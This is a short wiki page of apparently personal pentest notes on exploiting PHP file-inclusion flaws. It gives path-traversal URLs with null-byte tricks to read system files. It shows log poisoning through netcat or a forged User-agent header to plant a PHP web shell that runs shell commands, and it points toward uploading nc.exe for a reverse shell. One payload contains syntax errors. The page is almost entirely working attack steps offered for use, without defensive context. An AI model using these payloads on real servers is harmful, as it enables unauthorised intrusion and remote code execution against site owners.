-
Notifications
You must be signed in to change notification settings - Fork 14
Web_LFI
lethanhtung01011980 edited this page Jan 2, 2020
·
3 revisions
- LFI/RFI vulnerabilities allow an attacker to include a remote or local file into the webserver’s running PHP code.
- "Include" vulnerability
To display content
-
http://victim_ip/addguestbook.php?name=abc+2&comment=/&LANG=/../../../../../../windows/system32/drivers/etc/hosts%00&Submit=Submit
-
http://victim_ip/addguestbook.php?name=abc+2&comment=/&LANG=/windows/system32/drivers/etc/hosts%00&Submit=Submit
Make log file to contain PHP code
-
In attacker IP,
nc -nv victim_ip 80
-
Key in ONCE ONLY!!! and press ENTER a few times:
<?php echo shell_exec($_GET['cmd']);?>
-
Can use Burp to manipulate User-agent to posion log => User-agent:
<?php echo(exec($GET['cmd')); ?>
http://victim_ip/addguestbook.php?name=abc&comment=b&cmd=ipconfig&LANG=../../../../../ ../../xampp/apache/logs/access.log%00
- Can replace cmd with those in "File transfer" to upload nc.exe and create reverse shell.